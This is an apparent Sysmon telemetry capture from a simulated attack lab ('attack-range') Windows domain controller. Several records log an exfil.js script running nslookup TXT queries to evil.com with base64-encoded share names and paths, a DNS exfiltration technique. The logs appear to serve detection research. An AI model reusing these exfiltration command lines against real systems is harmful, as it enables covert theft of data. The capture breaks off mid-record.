14:16:31.549{2E1864BB-17BF-629A-7140-000000005F02}75767312C:\Windows\system32\cmd.exe{2E1864BB-17BF-629A-7340-000000005F02}3976C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200405Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.560{2E1864BB-17BF-629A-7340-000000005F02}3976C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BF-629A-7140-000000005F02}7576C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnkkq.tmp 2>&1 10341000x8000000000000000200404Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.517{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17BF-629A-7240-000000005F02}2068C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200403Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.517{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BF-629A-7240-000000005F02}2068C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200402Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.515{2E1864BB-17BF-629A-7240-000000005F02}20687952C:\Windows\system32\conhost.exe{2E1864BB-17BF-629A-7140-000000005F02}7576C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200401Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.495{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BF-629A-7240-000000005F02}2068C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200400Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.479{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200399Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.479{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200398Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.479{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200397Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.479{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200396Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.479{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BF-629A-7140-000000005F02}7576C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200395Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.479{2E1864BB-17A1-629A-783D-000000005F02}55524288C:\Windows\System32\WScript.exe{2E1864BB-17BF-629A-7140-000000005F02}7576C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200394Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.493{2E1864BB-17BF-629A-7140-000000005F02}7576C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnkkq.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000200393Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.479{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlomvp.tmpMD5=DF35AB54482476B9173CEB90AD028262,SHA256=D36A5C0891B34251E0B089204F7A21F9F91A19D06CA659E6438127A003B7EB57,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000200392Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.449{2E1864BB-17BF-629A-6F40-000000005F02}35527328C:\Windows\system32\conhost.exe{2E1864BB-17BF-629A-7040-000000005F02}1908C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200391Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.449{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200390Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.449{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200389Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.449{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200388Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.449{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200387Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.449{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BF-629A-7040-000000005F02}1908C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200386Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.449{2E1864BB-17BF-629A-6E40-000000005F02}57207880C:\Windows\system32\cmd.exe{2E1864BB-17BF-629A-7040-000000005F02}1908C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200385Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.456{2E1864BB-17BF-629A-7040-000000005F02}1908C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BF-629A-6E40-000000005F02}5720C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlomvp.tmp 2>&1 10341000x8000000000000000200384Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.417{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17BF-629A-6F40-000000005F02}3552C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200383Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.417{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BF-629A-6F40-000000005F02}3552C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200382Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.417{2E1864BB-17BF-629A-6F40-000000005F02}35527328C:\Windows\system32\conhost.exe{2E1864BB-17BF-629A-6E40-000000005F02}5720C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000200381Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.916{00000000-0000-0000-0000-000000000000}2040<unknown process>-udpfalsefalse127.0.0.1-52711-false127.0.0.1-53domain 354300x8000000000000000200380Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.916{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52711- 354300x8000000000000000200379Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.916{00000000-0000-0000-0000-000000000000}2040<unknown process>-udptruefalse127.0.0.1-52711-false127.0.0.1-53domain 354300x8000000000000000200378Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.916{00000000-0000-0000-0000-000000000000}2040<unknown process>-udpfalsefalse127.0.0.1-52710-false127.0.0.1-53domain 354300x8000000000000000200377Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.916{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52710- 354300x8000000000000000200376Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.916{00000000-0000-0000-0000-000000000000}2040<unknown process>-udptruefalse127.0.0.1-52710-false127.0.0.1-53domain 354300x8000000000000000200375Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.915{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52709- 354300x8000000000000000200374Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.915{00000000-0000-0000-0000-000000000000}2040<unknown process>-udptruefalse127.0.0.1-52709-false127.0.0.1-53domain 354300x8000000000000000200373Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.823{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52708- 354300x8000000000000000200372Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.823{00000000-0000-0000-0000-000000000000}8000<unknown process>-udptruefalse127.0.0.1-52708-false127.0.0.1-53domain 354300x8000000000000000200371Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.822{00000000-0000-0000-0000-000000000000}8000<unknown process>-udpfalsefalse127.0.0.1-52707-false127.0.0.1-53domain 354300x8000000000000000200370Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.821{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52707- 354300x8000000000000000200369Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.821{00000000-0000-0000-0000-000000000000}8000<unknown process>-udptruefalse127.0.0.1-52707-false127.0.0.1-53domain 354300x8000000000000000200368Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.821{00000000-0000-0000-0000-000000000000}8000<unknown process>-udpfalsefalse127.0.0.1-52706-false127.0.0.1-53domain 354300x8000000000000000200367Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.821{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52706- 354300x8000000000000000200366Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.821{00000000-0000-0000-0000-000000000000}8000<unknown process>-udptruefalse127.0.0.1-52706-false127.0.0.1-53domain 354300x8000000000000000200365Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.740{00000000-0000-0000-0000-000000000000}6848<unknown process>-udpfalsefalse127.0.0.1-52705-false127.0.0.1-53domain 354300x8000000000000000200364Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.740{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52705- 354300x8000000000000000200363Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.740{00000000-0000-0000-0000-000000000000}6848<unknown process>-udptruefalse127.0.0.1-52705-false127.0.0.1-53domain 354300x8000000000000000200362Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.642{00000000-0000-0000-0000-000000000000}6044<unknown process>-udpfalsefalse127.0.0.1-52704-false127.0.0.1-53domain 354300x8000000000000000200361Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.642{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52704- 354300x8000000000000000200360Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.642{00000000-0000-0000-0000-000000000000}6044<unknown process>-udpfalsefalse127.0.0.1-52703-false127.0.0.1-53domain 354300x8000000000000000200359Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.642{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52703- 354300x8000000000000000200358Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.642{00000000-0000-0000-0000-000000000000}6044<unknown process>-udptruefalse127.0.0.1-52703-false127.0.0.1-53domain 354300x8000000000000000200357Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.641{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52702- 354300x8000000000000000200356Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.641{00000000-0000-0000-0000-000000000000}6044<unknown 